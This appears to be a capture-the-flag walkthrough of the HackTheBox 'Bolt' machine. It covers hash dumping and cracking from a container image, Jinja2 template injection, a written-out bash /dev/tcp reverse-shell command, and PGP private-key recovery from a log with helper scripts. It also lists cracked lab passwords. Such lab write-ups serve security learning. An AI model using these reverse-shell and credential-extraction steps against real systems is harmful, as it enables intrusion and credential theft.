In this post, I would like to share a walkthrough of the Bolt machine from HackTheBox.
This machine is rated Medium difficulty on HackTheBox.
What will you gain from the Bolt machine?
For the user flag, you will exploit a Server-Side Template Injection (SSTI) in the web application to obtain a reverse shell on the machine.
For the root flag, you will recover a PGP private key from a Chrome extension log under the .config directory, crack its passphrase, and use it to decrypt a secret stored in the Passbolt database.
Information Gathering
Once the VPN connection is up (using the configuration file downloaded from HackTheBox), we can start information gathering on the machine by running nmap -sC -sV -p- -Pn <IP Address>
Let’s try to access the website interface
On the website, there are two functions: Login and Pages.
First, let’s look at the login page.
We don’t have any credentials, but let’s try common defaults such as admin:admin.
Sadly, we get a 403 ACCESS DENIED error!
So we need to find credentials that let us log in to the dashboard.
On the Pages function, there are a few links worth looking into, but the Download link caught my attention. Without further ado, let’s click the Download link.
The link redirects to a page that lets us download a file (image.tar) to our machine.
Let’s extract the archive with tar -xvf image.tar. It is a saved container image, so we are presented with a lot of files: one folder per layer.
Looking through the folders, I notice that each one contains a similar set of files, since every folder is an image layer.
Showing every file would make this a very long post, so I will only show the files that matter for gaining access.
There is a db.sqlite3 file from which we can obtain the username and password hash for the dashboard.
Gaining Access to the Bolt Machine
We can open db.sqlite3 with the sqlite3 command-line tool.
Honestly, I don’t have much experience with the sqlite3 tool, so we need to read the help (.help).
From the help output, I notice that we can run the .tables command to list the tables stored in db.sqlite3.
We obtain the admin password hash by running select * from user;
Let’s save the hash on our machine and crack it with john.
However, john cannot crack the hash, so we need to troubleshoot.
After a while, I found the problem: I had copy-pasted the hash incorrectly (john silently skips a hash whose format it cannot recognise, so a truncated or mangled hash just never cracks).
It should look as shown above.
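The steps above (extract the image, locate db.sqlite3 among the layers, dump the user table and prepare the hash for john) as one script. This is an added example, not code from the original post. It assumes the image follows the docker save layout (a manifest.json listing per-layer layer.tar files), a table named user with username and password columns, and hashes in modular crypt format ($id$salt$hash); the image, the rows and the hashes below are constructed placeholders, not the real data from the box. The shape check catches exactly the copy-paste damage described above before john silently ignores the hash.

```python
"""Added example: find db.sqlite3 inside a saved container image and turn its
user table into john input, rejecting hashes damaged by copy-paste."""
import io
import json
import os
import re
import sqlite3
import tarfile
import tempfile

# Constructed placeholders with the right shape; not real password hashes.
SAMPLE_ROWS = [
    ("admin", "$1$5G6NpcB1$Qy8Yh2gJ5Z9X1kC6W3fP0/"),   # md5crypt-shaped, intact
    ("bob",   "$1$5G6NpcB1$Qy8Yh2gJ5Z9X1kC6W3f"),      # tail lost in a copy-paste
    ("eve",   "$1$5G6NpcB1$Qy8Yh2gJ5Z9X1kC6W3fP0/ "),  # trailing space from the terminal
]

# Hash field length per crypt(3) id: md5crypt 22, sha256crypt 43, sha512crypt 86, bcrypt 53.
HASH_LEN = {"1": 22, "5": 43, "6": 86, "2a": 53, "2b": 53, "2y": 53}
MCF_RE = re.compile(r"^\$(?P<id>[0-9a-z]+)\$(?:rounds=\d+\$)?(?P<salt>[^$]+)\$(?P<hash>[^$]+)$")


def hash_shape_problem(h):
    """Return why `h` cannot be a complete modular-crypt hash, or None if it looks intact."""
    if h != h.strip():
        return "leading/trailing whitespace"
    m = MCF_RE.match(h)
    if not m:
        return "not of the form $id$salt$hash"
    want = HASH_LEN.get(m["id"])
    if want is not None and len(m["hash"]) != want:
        return f"hash field is {len(m['hash'])} chars, expected {want} for ${m['id']}$"
    return None


def layer_tar(files):
    """Build an uncompressed layer.tar from (archive name, source path) pairs."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as t:
        for arcname, src in files:
            t.add(src, arcname=arcname)
    return buf.getvalue()


def add_bytes(tar, name, data):
    info = tarfile.TarInfo(name)
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))


def build_sample_image(image_path):
    """Write a docker-save style image.tar with two layers; the second holds app/db.sqlite3."""
    with tempfile.TemporaryDirectory() as tmp:
        db = os.path.join(tmp, "db.sqlite3")
        con = sqlite3.connect(db)
        con.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
        con.executemany("INSERT INTO user (username, password) VALUES (?, ?)", SAMPLE_ROWS)
        con.commit()
        con.close()
        hostname = os.path.join(tmp, "hostname")
        with open(hostname, "w") as f:
            f.write("bolt\n")
        layers = [("l1/layer.tar", layer_tar([("etc/hostname", hostname)])),
                  ("l2/layer.tar", layer_tar([("app/db.sqlite3", db)]))]
        manifest = json.dumps([{"Config": "cfg.json", "RepoTags": ["bolt:latest"],
                                "Layers": [name for name, _ in layers]}]).encode()
        with tarfile.open(image_path, "w") as img:
            add_bytes(img, "manifest.json", manifest)
            for name, data in layers:
                add_bytes(img, name, data)


def find_in_layers(image_path, pattern):
    """Walk the manifest's layers in order (base first) and return (layer, member) hits."""
    hits = []
    with tarfile.open(image_path) as img:
        manifest = json.load(img.extractfile("manifest.json"))
        for layer in manifest[0]["Layers"]:
            with tarfile.open(fileobj=img.extractfile(layer), mode="r:") as lt:
                hits += [(layer, m.name) for m in lt.getmembers()
                         if m.isfile() and re.search(pattern, m.name)]
    return hits


def extract_member(image_path, layer, member, dest):
    with tarfile.open(image_path) as img:
        with tarfile.open(fileobj=img.extractfile(layer), mode="r:") as lt:
            data = lt.extractfile(member).read()
    with open(dest, "wb") as f:
        f.write(data)


def dump_user_hashes(db_path):
    """Same query as `select * from user;` in the sqlite3 shell, reduced to the two columns we need."""
    con = sqlite3.connect(db_path)
    rows = con.execute("SELECT username, password FROM user").fetchall()
    con.close()
    return rows


def john_lines(rows):
    """'user:hash' lines for intact hashes, and a dict of the ones that would never crack."""
    ok, bad = [], {}
    for user, h in rows:
        problem = hash_shape_problem(h)
        if problem:
            bad[user] = problem
        else:
            ok.append(f"{user}:{h}")
    return ok, bad


def run_demo():
    with tempfile.TemporaryDirectory() as tmp:
        image = os.path.join(tmp, "image.tar")
        build_sample_image(image)
        hits = find_in_layers(image, r"db\.sqlite3$")
        layer, member = hits[-1]            # the newest layer holding the file wins
        db = os.path.join(tmp, "db.sqlite3")
        extract_member(image, layer, member, db)
        ok, bad = john_lines(dump_user_hashes(db))
        return hits, ok, bad


if __name__ == "__main__":
    print(run_demo())
```

Write the ok lines to a file and run john on it; anything reported in bad should be re-copied from the database rather than handed to john.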
Finally, we have successfully obtained the admin password. Let’s log in to bolt.htb with these credentials:
- username: admin
- password: deadbolt
Maintaining Access
Let’s roam around the dashboard to find any vulnerabilities or bugs.
From the direct chat above, we are informed that there is another domain hosted on the machine. Let’s enumerate subdomains with gobuster.
Wow! We find two new subdomains: mail and demo.
The demo subdomain only shows a login page that requires credentials. Let’s create an account for it.
Registration requires the invite code that we found earlier.
Finally, we can register an account using the invite code.
Voila! We can access the dashboard with the account we just created.
We may also be able to log in to Roundcube on the mail subdomain with those same credentials.
There are no emails stored there when we access mail.bolt.htb.
We should also note the version of Roundcube Webmail in use.
Let’s roam around the dashboard in case we find any useful vulnerabilities.
Attack verification on the website
Cross-Site Scripting
Let’s test the profile settings first; for a start, we can try Cross-Site Scripting (XSS) to see whether our input is reflected unescaped in the interface.
An email asks us to click a link to confirm the profile change.
## This step is repeated every time we make a change to the profile ##
Sadly, nothing happens when we run the XSS attack on the profile.
Server-Side Template Injection (SSTI) attack
So let’s try SSTI instead.
The steps are the same as before.
Oh wow, the input is evaluated by the template engine, so SSTI is present on the system.
Let’s do some research on SSTI so that we can exploit it.
HackTricks lists payloads we can use for SSTI.
Another payload that testers commonly use to confirm SSTI is {{config}}, which dumps the application’s configuration object.
We got the config shown above.
Based on the research, let’s try some Jinja2 SSTI payloads to run “id” (the config dump tells us this is a Python/Jinja2 application, not a Java one).
Sadly, that payload failed to return the output of “id”.
Let’s try another SSTI payload.
YES! We managed to retrieve the output that we wanted so badly.
Let’s start our nc listener so that we can catch the connection back.
To get a reverse shell, I change “id” to /bin/bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1' (single quotes around the inner command, so the shell redirections are not interpreted by the outer bash).
We get the reverse shell back.
In the home directory there are two users: clark and eddie.
There is also a passbolt directory, which is not something you normally find on a Linux system.
We notice a file called passbolt.php, which might contain credentials.
Reading passbolt.php gives us a password.
At last, we find that the same password is used by eddie.
Let’s SSH into the machine as eddie to get a more stable shell.
We can obtain the user flag by running cat user.txt
Escalate to Root Privileges on Bolt
Before going any further, we need to access the MySQL database, where a table (secret) holds an encrypted message like the one below:
-----BEGIN PGP MESSAGE-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org

…
=P38i
-----END PGP MESSAGE-----
We should save the encrypted message, as we will need it later.
Looking back, mail played a part in getting our foothold, so let’s check the /var/mail/ directory, where there is a mailbox file for eddie.
In eddie’s mailbox, we spot an email from clark that mentions an extension for your browser.
Let’s look in the directory mentioned above in case something interesting is there.
There is a log file that we can analyze further.
The file contains a lot of things, but the PGP key blocks caught my attention the most.
We can save the PGP private key block as anything.key and convert it to a hash with gpg2john anything.key > anything.hash (gpg2john works on the passphrase-protected private key, so the public key block alone is not enough).
After conversion, the hash file looks as shown above and can be fed to john to recover the passphrase of eddie’s PGP key.
I stumbled over an issue here, but if everything works well, you will get the passphrase merrychristmas.
Once we have the passphrase merrychristmas, we can decrypt the message we saved earlier.
To obtain the password from the encrypted message, we run the following commands:
- gpg --batch --import anything.key
- gpg --pinentry-mode loopback --passphrase merrychristmas -d encrypted_message.asc
In the end, you get the password (Z(2rmxsNW(Z?3=p/9s) for the root account.
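Pulling the armored key out of the log file is the fiddly part of the steps above, so here is an added helper (not from the original post) that extracts every ASCII-armored PGP block from a noisy log, undoes the literal \r\n escapes that JSON-style loggers write, and picks the private key that gpg2john needs. The log text below is constructed to mimic such a file; the armored bodies are placeholder base64, not real key material, and the file names and wordlist path in the comments are assumptions.

```python
"""Added example: extract PGP armor blocks from a log file for gpg2john / gpg."""
import re

ARMOR_RE = re.compile(
    r"-----BEGIN PGP (?P<kind>[A-Z ]+?)-----\n(?P<body>.*?)-----END PGP (?P=kind)-----",
    re.S,
)

# Constructed sample: one JSON line per entry, key stored with literal \r\n escapes,
# placeholder base64 bodies (not real keys).
SAMPLE_LOG = (
    '{"level":"info","msg":"keyring loaded","key":"-----BEGIN PGP PUBLIC KEY BLOCK-----'
    '\\r\\nVersion: OpenPGP.js v4.10.9\\r\\nComment: https://openpgpjs.org\\r\\n\\r\\n'
    'xsBNBGEXAMPLEPUBLICKEYBODYAAAA\\r\\n=AbCd\\r\\n-----END PGP PUBLIC KEY BLOCK-----"}\n'
    '{"level":"info","msg":"private key cached","key":"-----BEGIN PGP PRIVATE KEY BLOCK-----'
    '\\r\\nVersion: OpenPGP.js v4.10.9\\r\\n\\r\\n'
    'xcMGBGEXAMPLEPRIVATEKEYBODYAAAA\\r\\n=WxYz\\r\\n-----END PGP PRIVATE KEY BLOCK-----"}\n'
)


def unescape_log(text):
    """Turn literal \\r\\n and \\n sequences back into newlines; gpg rejects the escaped form."""
    return text.replace("\\r\\n", "\n").replace("\\n", "\n")


def extract_armored(text):
    """Map armor kind ('PRIVATE KEY BLOCK', 'MESSAGE', ...) to the complete blocks found."""
    found = {}
    for m in ARMOR_RE.finditer(unescape_log(text)):
        block = f"-----BEGIN PGP {m['kind']}-----\n{m['body']}-----END PGP {m['kind']}-----\n"
        found.setdefault(m["kind"], []).append(block)
    return found


def key_for_gpg2john(blocks):
    """gpg2john hashes the passphrase-protected secret key, so a PUBLIC KEY BLOCK is useless
    to it; return the first private key block or None."""
    priv = blocks.get("PRIVATE KEY BLOCK")
    return priv[0] if priv else None


def write_key(blocks, path="anything.key"):
    key = key_for_gpg2john(blocks)
    if key is None:
        raise SystemExit("no PRIVATE KEY BLOCK in the log; gpg2john needs the secret key")
    with open(path, "w") as f:
        f.write(key)
    return path


# With anything.key written, the remaining steps (wordlist path is an assumption):
#   gpg2john anything.key > anything.hash
#   john --wordlist=/usr/share/wordlists/rockyou.txt anything.hash
#   gpg --batch --import anything.key
#   gpg --pinentry-mode loopback --passphrase '<cracked passphrase>' -d encrypted_message.asc

if __name__ == "__main__":
    blocks = extract_armored(SAMPLE_LOG)
    print({kind: len(v) for kind, v in blocks.items()})
    print(key_for_gpg2john(blocks))
```

Run it against the real log with extract_armored(open(path).read()); if only a PUBLIC KEY BLOCK comes back, keep looking, because the passphrase cannot be recovered from the public half.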
We can read the root flag by running the “cat root.txt” command
-THE END-
Happy Learning Guys!
Extra Information on Bolt
The root password hash from /etc/shadow can be submitted on HackTheBox to unlock the official write-up for the machine.